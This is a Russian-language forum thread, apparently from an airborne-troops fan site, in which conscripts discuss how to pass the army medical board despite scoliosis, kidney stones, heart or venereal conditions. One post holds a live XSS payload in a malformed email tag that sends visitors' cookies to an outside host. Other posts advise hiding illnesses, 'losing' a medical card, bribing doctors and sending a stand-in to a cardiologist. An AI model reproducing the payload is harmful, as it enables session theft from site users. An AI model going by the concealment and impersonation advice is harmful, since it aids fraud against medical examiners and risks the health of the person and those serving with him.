Десантура.ру
На главную Поиск по сайту Обратная связь
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Главная  |  Карта сайта  |  Войти  |  Регистрация

МЕД. КОМИССИЯ


Поделитесь с друзьями:

Страницы: 1 2 След.
RSS
МЕД. КОМИССИЯ, Небольшие проблемы с хирургом
 
Здравствуйте, уважаемые посетители форума!
У меня небольшая такая проблема:
Я проходил мед. комиссию в военкомате, прошёл всех врачей с отметкой "Здоров" кроме хирурга. Он написал скалеоз I степени. Разговаривал с подполковником, он посоветовал сделать снимки спины (поясничного отдела). Дело в том, что скалеоз у меня есть и врачи не могут его никак скрыть на снимках (и конфеты приносил, и уговаривал - толку нет, они физически этого не могут), а я очень хочу, чтобы был "Годен без ограничений". Очень срочно нужно придумывать, что делать. Посоветуйте, пожалуйста! Очень-очень срочно нужно. Очень хочу в ВДВ!
 
Не стоит ничего выдумывать, обратись к знакомым хирургам, и послушай что скажут они. Поверь, если у тебя действительно что-то серьезное, то несмотря на твои благие желания, ты можешь подставить не только себя, но и боевых товарищей.
Все мы герои фильмов про войну, или про первый полет на Луну ...
 
Дружище,послушай СТАРИКА.Если твой позвоночник тихо упадет в кальсоны от этого никто не выиграет.
 
Сколько градусов смещение?
Долг, честь, мужество.
 
У меня был скалеоз,правда степени не помню,лет в 13-14.Но видимо выпрямил его турником,либо врачи просмотрели...Хотя приписали в МФ,но после некоторых манипуляций попал туда куда хотел ;) ...а вообще то не стоит дёргатся если проблема серьёзная!Тут Старик прав!!
Сила и честь
 
лучше дома сиди
 
Уменя скалиоз 1 степени в военкомате херург проглядел поставил А1, узнал только когда снимки делал.смещение на 1.5 градуса.Сейчас на турнике побольше сктараюсь времени проводить.
попробуй с врачами поговорить, если скажут можно- выправляй на турничке.
Долг, честь, мужество.
 
[email=pashahak@mail.ru.com'>pashahak@mail.ru<a href='http://www.desantura.ru/forums/`=`' target='_blank'>[/email].com ` style=`background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
От моего удара кони рыгают...
 
Вот решил поделиться своими опасениями по мед.ком-сии.
Есть проблема. Недавно определили 2 небольших камня в почках(маленькие).Есть ? определят или нет на мкомисси если не успею
справиться до осени?
Нужен ответ знающего человека,подскажите.!!!
 
Цитата
VovanFrol  пишет
Здравствуйте, уважаемые посетители форума!
У меня небольшая такая проблема:
Я проходил мед. комиссию в военкомате, прошёл всех врачей с отметкой "Здоров" кроме хирурга. Он написал скалеоз I степени.
Знакомая проблема, точнее все тоже самое было. Если есть время хотя бы месяца два, то есть все шансы вылечиться. Обратись к врачу который занимается мануальной терапией. Я вот лечился два месяца, делал спец. гимнастику и верил, что всё будет ок. И потом сделал снимки и всё, ничего не было, годен! Врач даже сам удивился что за такой короткий срок излечился. Так всё возможно, главное действуй.

А по поводу камней в почках... Если ты им сам на комиссии не скажешь или врачи не увидят записи в мед. карте, то каким образом они определят твои камни в почках?
Veni, vidi, vici
 
Мужики а если потерять больничную карту?
Не приведет такая ситуация к дополнительному обследованию?
Можно будет проскочить, если не успею справиться с недугом?
Никто не сталкивался с подобной проблемой? :ph34r:
 
Мне тоже весной уходить а психиатр грузит вопросами я просто теряюсь !
у самого кифоз не большой 1 ст. эт норм 173 см рост !
Подскажите как отвечать на вопросы такие как чем гора от кучи отличается и отсров от полуострова !
и еще почему нельзя утаить шило в мешке ?
ЗА ВДВ !!!!!!!!![/COLOR]
 
<br/>
! <br/><br/> Напоминаю о существовании п. 20 Правил поведения на форуме!  <br/> <br/>
 
А что такое "кифоз"? Он тебя устно спрашивает или тестики заставляет писать?
Долг, честь, мужество.
 
тоже самое что лордоз ! искревление позвоночника !
устно !
ЗА ВДВ !!!!!!!!![/COLOR]
 
А ну ясно, так вот на счёт вопросов-Отвечай как думаешь, не прикалывайся, не ржи, делай умный вид и серьёзный, чё не понятно уточняй, только не часто а то падумают что даун.Как можно логичнее.попробуй по душам разговор мимоходом завести типа что в войска хочешь с детсва и тд. А небольшой кифоз это сколько градусов? Херург заметил его?
Долг, честь, мужество.
 
Уважаемые форумчане, вот такой вопрос. Как вообще присваивается категория годности? Что бы была категория годности "А" - это чтобы все врачи поставили "А" или есть небольшой процент, если допустить что кто-то из врачей поставит "Б"? Или если один врач ставит группу "Б", то у тебя становится группа "Б"?
 
SAT у меня так же только психиатр поставил Б2 и все стразу категория Б !
щас 3 апреля буду проходить все заного , все справки собрал и думаю и люди помогут зделаю А1 !

Кифоз он на ренгене если небольшой градус его не увидят мне на спец аппаратуре делали там градуса 4 -или 6 ! это как бы ни че сказали !
ЗА ВДВ !!!!!!!!![/COLOR]
 
Категория годности выставляется из расчёта на то что поставили все врачи. Есть подкатегории общего Например А1 А2 А3.Т.е если окулист поставил из за одноог левого глаза Б, то в общем тебе поставить могут А2,(случай знакомого, сейчас как не пародоксально снайпер в МП), а есть у них отработаная схема, как многие заметили, если по основным здоров, то на мелкие косяки не обращают внимание и ставят А1, к стати психиатр многих режет, пацаны у него что-то прикалывались он их на дополнительное обследование отправил и Б4 поставил.
Долг, честь, мужество.
 
Arti про снайпера, Я не удивлюсь. У знакомого был знакомый, правда или нет, не знаю. Зрение слабоватое было, попал в Армию. И, что бы визически он там не перегружался, его сделали снайпером. Всё равно, оптика поможет.
Ещё вот такой вопрос. Если сейчас у меня военный билет, с категорией "В", то есть Я рядовой запаса и Я повышаю категорию до "А". Меня призывают на срочку или Я так и остаюсь в запасе?
 
Если ни кто не узнает о твоём желании служить и о том что у тебя здоровье улучшилось в военкомате(заново не пройдёшь мед осмотр поговорив с военкомом) то остаёшься в запасе.
Долг, честь, мужество.
 
вот психиатр такая ......... к психологу направила сходил все нормально говорит у тебя щас 24 апреля опять к психиатру идти за заключением чтоб А поставила категорию !
ЗА ВДВ !!!!!!!!![/COLOR]
 
В данный момент мне 17 лет, учусь. Через2 года пойду в армию, и конечно же хочу попасть в ВДВ. Рост 180, вес 73 кг.  Занимаюсь спортом: по утрам бегаю по 5-7 км, занимаюсь в тренажёрном зале (3 раза в неделю)
На недавнем осмотре мне сказали что у меня скалиоз. На вашем форуме я узнал что с таким заболеванием не берут в ВДВ. Как написано выше занимаюсь в качалке, упражнения делаю и на спину (присед 170, тяга 170), во и после тренировок боли в спине у меня нет. Каковы мои шансы попасть в ВДВ?


Соеденины две темы имеющие общую тематику.
Прежде чем создавать новую тему воспользуйтесь поиском!
 
А какой степени сколиоз, если второй степени то тебя не то что в ВДВ, а в стройбат даже не заберут. А что тренируешся молодец, у меня тоже когда нашли сколиоз врачи запретили делать становую и приседания, но я их не послушал и не очём не жалею, ведь это основные упражнения развивающие общую мышечную массу тела и выносливость. Я тоже здоров как бык, по всем врачам был А1, а сколиоз всё испортил. Пробуй может прорвёшься.
 
Сколиоз 1 степени. В билете написали годен с незначительными ограничениями. Реально ли исправить с помощью мануальной терапии? Какой срок? В чём её суть?
 
Цитата
asd пишет
А какой степени сколиоз, если второй степени то тебя не то что в ВДВ, а в стройбат даже не заберут. А что тренируешся молодец, у меня тоже когда нашли сколиоз врачи запретили делать становую и приседания, но я их не послушал и не очём не жалею, ведь это основные упражнения развивающие общую мышечную массу тела и выносливость. Я тоже здоров как бык, по всем врачам был А1, а сколиоз всё испортил. Пробуй может прорвёшься.
Asd ты служил? В каких войсках?

Устное предупреждение!
Напоминаю о существовании Правил и п. 24!
 
Ребята а берут с Пролапсом Митральным Клапаном  ???
ЗА ВДВ !!!!!!!!![/COLOR]
 
"Ребята а берут с Пролапсом Митральным Клапаном ??? "
А это в каком месте?
Вот короче сайт там все болезни расписаны http://www.shkolnik.ru/army/
Долг, честь, мужество.
 
Это в сердце Ну кардиолог говорит это у всех спорстменов , а вот Врач на приемной коммисии говорит что это Б4 и ни как тебе в ВДВ , я ей так мол и так что кардиолог сказал а она ни в какую б4 танковые войска мне говорит пойдеш !
Что делать ? но Возможно Двести Вариантов тут просто я взыл с собой поцана и пойдем 2 мая к кардиологу она его посмотрит и напишет на мою фамилию что нет ПМК !!
вот так вот !

Устное предупреждение!
Вновь напоминаю участникам дискусии о существовании Правил и п.20!
При повторении подобных высказываний тема будет закрыта, авторы подобных высказываний получат возможность повторно изучить Правила поведения на Форуме!
ЗА ВДВ !!!!!!!!![/COLOR]
 
Народ кто знает в ВДВ берут если на краевой комиссии если у тебя обнаружили венерическое заболевание ! ( трихоманиаз, гонорею,Хламидиоз или грибы) ну что то типо из этого !!! или кожное .
просто парень боится идти на краевую комиссию так как подхватил венеричку а сам годен в ВДВ !
ЗА ВДВ !!!!!!!!![/COLOR]
Страницы: 1 2 След.
Читают тему (гостей: 1)




Все права на материалы, используемые на сайте, принадлежат их авторам.
При копировании ссылка на desantura.ru обязательна.
Professor - Создание креативного дизайна сайтов и любые работы с графикой